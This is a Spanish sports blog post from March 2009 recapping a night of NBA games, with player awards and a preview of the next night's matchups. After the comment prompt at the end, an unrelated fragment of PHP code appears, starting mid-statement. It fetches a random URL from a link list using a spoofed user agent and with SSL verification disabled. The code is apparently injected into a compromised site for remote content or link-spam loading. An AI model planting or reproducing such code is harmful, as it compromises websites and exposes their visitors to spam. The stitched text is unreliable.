La Crónica (13/03/2009)

15 de March de 2009 por Viva_Dirk

Jornada maratoniana de viernes… y muy bonita, aunque poco dada a las sorpresas. Como debe de ser, por otro lado, a estas alturas de temporada.

Destacábamos ayer un partido en el Wachovia Center que nunca iba a tener lugar. Se disputó en el legendario Spectrum, a modo de despedida pues lo van a tirar abajo. En un partido tan especial los chicos de Philadelphia sacaron sus mejores galas. 31 ptos de Thadeus, 19 rebotes de Dalembert, 13 asistencias de André Miller, partidazo de Iguodala… Con todo, a punto estuvo Chicago de remontar en el último cuarto y aguarles la fiesta.

También nos preguntábamos si Lebron lograría su cuarto triple doble consecutivo contra un rival asequible como Sacramento. No hubo premio… al menos en ese sentido. El premio de una sufrida victoria en la que tuvo que emplearse bien a fondo con prórroga incluida fue el título de la Central y actuación sobresaliente en su carrera por el MVP. No es mala caza tampoco.

En el intento cada vez más complicado de alcanzarlos en la primera plaza del este, Celtics y Orlando hicieron los deberes. No es que tuvieran demasiados problemas contra Grizzlies y Wizards respectivamente. Mucho nos tememos que la respuesta a la pregunta que lanzábamos ayer es un SÍ claro. Sin embargo no es asunto baladí la ventaja campo entre Cavs y Lakers. Parece que ambos tendrán que sudar sangre hasta la última jornada para cerrar ese tema.

Del resto de partidos destacamos la eterna derrota de los Mavs en Oakland que nos traslada a otros tiempos no demasiado lejanos. El gran partido que hizo Jason Kidd y la que le armó Monta. Por suerte para Dallas anoche no había en juego lo que perdieron antaño.

También es noticia la tercera victoria consecutiva de New York en Mineapolis, con la enésima gran actuación del pequeñito que no le gusta a Viva. Muchas posibilidades para D’Antoni de dar la campanada este mismo año.

Estuvieron emocionantes los partidos de Toronto, poniéndoselo dificilísimo a Detroit (y Bosh haciéndose querer) y el de Charlotte, donde Artest estuvo bastante más decisivo que el otro día contra Kobe, deshaciendo el empate con un triple a falta de 22′ y un tapón final a nuestro viejo amigo Radmanovic. Algo más fácil lo tuvieron Atlanta contra Indiana y Portland contra New Jersey.

PREMIOS

MVP: En un partido donde Mo Williams estuvo muy mal y sin Ilgauskas mas de la mitad del encuentro, Lebron James hizo uno de esos partidos. En 47 minutos de juego tiró 30 veces a canasta de las cuales anotó 16 más un impropio 15 de 17 en tiros libres, capturó 4 rebotes, repartió 9 asistencias, robó dos balones y puso 3 tapones. También merecen ser mencionados Rip Hamilton, Joe Johnson, Chris Paul, Brandon Roy y Stephen Jackson.

Rookie: Buenos partidos de OJ Mayo, Rose, Hibbert, Thompson, y B.Lopez, pero todos vieron como caian sus equipos sin poder remediarlo. Muy buena aportación de Batum a los Blazers con 20 puntos con un casi perfecto 7 de 8 en tiros. Le damos el premio a un poco habitual, Anthony Randolph de los Warriors ayudó a la victoria de su equipo contra Dallas con una completísima actuación, en 21 minutos le dió para hacer 6 faltas, anotar 14 puntos, coger 7 rebotes, dar 3 asistencias, robar 3 balones y poner 3 tapones, sin pérdidas de balón.

La sorpresa: Los partidazos de Wilson Chandler, Mickael Pietrus, Thaddeus Young, Varejao nos sorprenden aunque esperemos grandes cosas de unos y sepamos valorar a otros, pero lo que menos se espera uno al abrir un box score de Boston Celtics es ver 30 puntos, 11 rebotes, 3 asistencias, 5 tapones, 0 pérdidas y grandes porcentajes de Leon Powe, que también nos mola pero no creemos que le veamos hacer mas veces de Garnett.

La Decepción: Sin duda Dallas Mavericks que no supo ganar a GSW para sentenciar aun mas su pase a las post temporada. No se queda atrás Chicago que tenia un rival mas duro pero que tiene que espabilar, ayer fue cosa del que esta siendo su mejor jugador esta temporada, Ben Gordon se quedó en 9 puntos con 4 de 12 en tiros. Tampoco estuvieron a la altura esperada Charlie Villanueva, Josh Smith, Mo Williams y Yi Jianlian.

Mayor esfuerzo en Vano: Se lucieron y perdieron Devin Harris, Kevin Martin, Richard Jefferson, Ryan Gomes, TJ Ford y Jose Calderón. El trio de Dallas Kidd-Terry-Nowitzki sumó 68 puntos, 20 rebotes y 18 asistencias, aun nos preguntamos en que pensaba el resto del equipo. Pero el premio de hoy va para un miembro destacado del club ‘mas nueces que ruido’, Antawn Jamison acabó anoche con 36 puntos y 6 rebotes, y en un equipo donde casi nada funciona el esta haciendo de nuevo un temporadón con 22 puntos y 9 rebotes por noche.

Razones para trasnochar

San Antonio-Houston: Los Rockets reciben a los Spurs con la intención de reducir la ventaja que los primeros tienen sobre ellos. El duelo de la noche estará en la pintura entre Tim Duncan y Yao Ming, pero se antoja decisiva la aportación de los bases locales para no permitir a Tony Parker trabajar en un solo lado de la cancha como hace muchas noches. Un duelo tejano siempre deja cosas interesantes.

Atención a….Tyson Chandler que visita la que fuera su casa durante 5 temporadas y lo hace en su mejor momento de la temporada, su particular duelo con Joakim Noah bajo los aros será digno de ver y muy importante en el desarrollo del partido. No hace falta que os digamos que esteis atentos a Wade y Paul.

 

Esta entrada no tiene comentarios... pero tú puedes ser el primero.

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>